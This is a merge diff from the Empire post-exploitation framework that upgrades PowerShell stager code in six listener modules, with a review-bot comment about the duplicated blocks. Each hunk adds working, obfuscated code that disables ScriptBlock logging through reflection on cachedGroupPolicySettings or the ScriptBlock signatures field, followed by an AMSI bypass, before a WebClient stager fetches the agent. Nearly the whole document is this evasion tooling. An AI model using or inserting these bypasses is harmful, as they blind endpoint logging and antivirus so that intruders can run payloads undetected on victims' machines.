Merge pull request #740 from cobbr/empire-dev
Improved ScriptBlock logging bypasses (websockets-multiuser)
commit
408782a265
@ -175,15 +175,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -191,6 +198,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
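Review bot: The new prologue in this section — from the `If($PSVersionTable.PSVersion.Major -ge 3){` line through the closing `stager += "}"` after the AMSI block — is pasted line for line into the five other listener sections of this PR (the hunks headed @172, @192, @147, @126 and the Outlook one at @175), so any later correction has to be repeated six times. Every copy already depends on `helpers`, so the block is a natural candidate for one shared helper that returns the assembled string, with each listener keeping only the `safeChecks` gate and a single call such as `stager += helpers.build_stager_prologue()` (constructed name, to be chosen). The Outlook section also emits its `stager += "}"` before the AMSI comment rather than after it, unlike the other five; whether that ordering is intended is not clear from the hunk, and a single helper would make the choice explicit in one place. The enclosing method starts and ends outside the hunk.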
@ -192,15 +192,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -208,6 +215,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
@ -172,15 +172,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -188,6 +195,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
# TODO: reimplement stager retries?
|
# TODO: reimplement stager retries?
|
||||||
|
|
|
@ -147,15 +147,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -163,6 +170,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
@ -126,15 +126,22 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||||
|
@ -142,6 +149,7 @@ class Listener:
|
||||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||||
|
stager += "}"
|
||||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||||
|
|
||||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||||
|
|
|
@ -175,15 +175,23 @@ class Listener:
|
||||||
|
|
||||||
stager = ''
|
stager = ''
|
||||||
if safeChecks.lower() == 'true':
|
if safeChecks.lower() == 'true':
|
||||||
|
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
|
||||||
|
|
||||||
# ScriptBlock Logging bypass
|
# ScriptBlock Logging bypass
|
||||||
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
|
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
|
||||||
stager += "'System.Management.Automation.Utils'"
|
stager += "'System.Management.Automation.Utils'"
|
||||||
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
|
||||||
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
|
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
|
||||||
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
|
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']"
|
||||||
stager += helpers.randomize_capitalization("$GroupPolicySettings")
|
stager += helpers.randomize_capitalization("){$GPS")
|
||||||
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
|
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
|
||||||
|
stager += helpers.randomize_capitalization("$GPS")
|
||||||
|
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
|
||||||
|
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
|
||||||
|
stager += "'signatures','N'+'onPublic,Static'"
|
||||||
|
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||||
|
stager += "}"
|
||||||
|
|
||||||
# @mattifestation's AMSI bypass
|
# @mattifestation's AMSI bypass
|
||||||
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
|
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
|
||||||
|
|